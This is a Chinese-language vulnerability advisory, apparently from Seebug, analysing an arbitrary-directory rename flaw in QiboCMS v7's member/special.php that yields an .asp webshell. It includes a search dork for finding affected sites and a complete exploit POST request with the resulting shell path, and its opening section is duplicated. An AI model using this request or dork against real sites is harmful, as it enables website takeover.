### 简要描述: ### 详细说明: 0x01 简介 齐博CMS前身是2003年所创建的PHP168网站管理系统,它是国内主流CMS系统之一,曾多次被新浪网、腾讯网、凤凰网等多家大型IT媒体报道。齐博CMS目前已有数以万计的用户在使用,覆盖政府、 企业、科研教育和媒体等各个领域。 其中通过关键字批量搜索,统计有26w多条记录 inurl:bencandy 遍及大量企业、政府、教育等等单位: [<img src="https://images.seebug.org/upload/201408/05170739700d5366e0dc915ef906df4359271215.jpg" alt=")R8@PWI8]]_I(3~0[~8WOH8.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/05170739700d5366e0dc915ef906df4359271215.jpg) 0x02 漏洞分析 在member\special.php中 ``` if($job=='editsp'||$job=='addsp'){ if($step==2){ //echo 'aaaaa'; if(!$postdb[title]){ showerr("名称不能为空"); }elseif(!$postdb[fid]){ showerr("分类不能为空"); } ....//省略若干无关代码 if($postdb[picurl]&&!eregi("(jpg|gif|png)$",$postdb[picurl])){ showerr("封面只能是JPG,PNG,GIF格式的图片"); } /*缩略图处理*/ if( $postdb[picurl] && !strstr($postdb[picurl],"http://") ) { //图片目录转移 //echo $lfjdb[uid].'---'.tempdir($postdb[picurl]).'---'.$postdb[fid];exit();...
### 简要描述: ### 详细说明: 0x01 简介 齐博CMS前身是2003年所创建的PHP168网站管理系统,它是国内主流CMS系统之一,曾多次被新浪网、腾讯网、凤凰网等多家大型IT媒体报道。齐博CMS目前已有数以万计的用户在使用,覆盖政府、 企业、科研教育和媒体等各个领域。 其中通过关键字批量搜索,统计有26w多条记录 inurl:bencandy 遍及大量企业、政府、教育等等单位: [<img src="https://images.seebug.org/upload/201408/05170739700d5366e0dc915ef906df4359271215.jpg" alt=")R8@PWI8]]_I(3~0[~8WOH8.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/05170739700d5366e0dc915ef906df4359271215.jpg) 0x02 漏洞分析 在member\special.php中 ``` if($job=='editsp'||$job=='addsp'){ if($step==2){ //echo 'aaaaa'; if(!$postdb[title]){ showerr("名称不能为空"); }elseif(!$postdb[fid]){ showerr("分类不能为空"); } ....//省略若干无关代码 if($postdb[picurl]&&!eregi("(jpg|gif|png)$",$postdb[picurl])){ showerr("封面只能是JPG,PNG,GIF格式的图片"); } /*缩略图处理*/ if( $postdb[picurl] && !strstr($postdb[picurl],"http://") ) { //图片目录转移 //echo $lfjdb[uid].'---'.tempdir($postdb[picurl]).'---'.$postdb[fid];exit(); move_attachment($lfjdb[uid],tempdir($postdb[picurl]),"special/$postdb[fid]"); ``` 其中看函数move_attachment $lfjdb[uid]为uid,它是不可控的变量。 $postdb[picurl] 为提交图片url 其中会经过一系列函数处理,为可控变量。 $postdb[fid] 为我们可控变量,其为post提交的值。 我们跟踪move_attachment函数 在inc/function.inc.php中800行处 ``` function move_attachment($uid,$str,$newdir,$type=''){ global $webdb; if(!$str||!$uid||!$newdir){ return $str; } //echo 'test'; $filedb = get_content_attachment($str); //var_dump($filedb);exit(); foreach($filedb AS $value){ $name=basename($value); $ture_old_path = ROOT_PATH."$webdb[updir]/$value"; $ture_new_path = ROOT_PATH."$webdb[updir]/$newdir/$name"; if(is_file($ture_new_path)||!is_file($ture_old_path)){ continue; } $detail=explode("_",$name); //获取文件的UID与用户的UID一样时.才删除.不要乱删除 if($detail[0] && $detail[0]==$uid){ if(!is_dir(ROOT_PATH.$webdb[updir]."/".$newdir)){ makepath(ROOT_PATH.$webdb[updir]."/".$newdir); } //自动缩小太大张的图片 if( $webdb[ArticlePicWidth] && $webdb[ArticlePicHeight] && eregi("(gif|png|jpg)$",$ture_old_path) ){ $img_array=getimagesize($ture_old_path); if($img_array[0]>$webdb[ArticlePicWidth]||$img_array[1]>$webdb[ArticlePicHeight]){ gdpic($ture_old_path,$ture_old_path,$webdb[ArticlePicWidth],$webdb[ArticlePicHeight],1); } } //图片加水印 if( $type!='small' && $webdb[is_waterimg] && eregi("(gif|png|jpg)$",$ture_old_path) ){ include_once(ROOT_PATH."inc/waterimage.php"); imageWaterMark($ture_old_path,$webdb[waterpos],ROOT_PATH.$webdb[waterimg]); } if( @rename($ture_old_path,$ture_new_path) ){ $str=str_replace("$value","$newdir/$name",$str); } } } return $str; } ``` 其中get_content_attachment 函数为统计附件函数,返回该目录下的附件文件名。 将变量filedb 进行遍历。 在遍历过程中,将旧文件 移往新文件夹。 ``` foreach($filedb AS $value){ $name=basename($value); $ture_old_path = ROOT_PATH."$webdb[updir]/$value"; $ture_new_path = ROOT_PATH."$webdb[updir]/$newdir/$name"; ``` 其中$newdir为我们前面可控的变量,顾这个路径为我们所控制。。顾我们可将我们的变量控制位:1.asp 在结尾 ``` if( @rename($ture_old_path,$ture_new_path) ){ $str=str_replace("$value","$newdir/$name",$str); } ``` 我们可看到rename这个过程,直接判断之后直接rename了。。。 漏洞产生。。。 0x03 漏洞利用 1、上次一个图片马。。。 2、将图片马地址记下来 ``` POST /v7/member/special.php?job=editsp HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/v7/member/special.php?job=editsp Cookie: USR=z89xpd7c%0917%091407136845%09http%3A%2F%2Flocalhost%2Fv7%2Fdo%2Fupfile.php%3Fdir%3Dspecial; passport=2%09test1234%09BQVRUlNRVFJUA1YGAlxQWFUCXVoFAl1SUVcFAAFWBwM%3D62c7013782 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 191 postdb%5Btitle%5D=aaaaaaaaaaaa&postdb%5Bfid%5D=sb.asp&postdb%5Bpicurl%5D=special%2F2_20140804150846_eka9t.png&postdb%5Bbanner%5D=&postdb%5Bcontent%5D=aaaaaa&Submit=+%CC%E1+%BD%BB+&step=2&id=0 ``` 其中即可获取一个shell。。。最后文件名不会变。 http://xxxx.com/upload_files/special/sb.asp/2_20140804150846_eka9t.png [<img src="https://images.seebug.org/upload/201408/05171954cd268e4ac7c99a2ae88a8291085831f1.jpg" alt="LAT$30CJ2CPF{82%2BO@BWH.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/05171954cd268e4ac7c99a2ae88a8291085831f1.jpg) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201408/05171954cd268e4ac7c99a2ae88a8291085831f1.jpg" alt="LAT$30CJ2CPF{82%2BO@BWH.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/05171954cd268e4ac7c99a2ae88a8291085831f1.jpg)
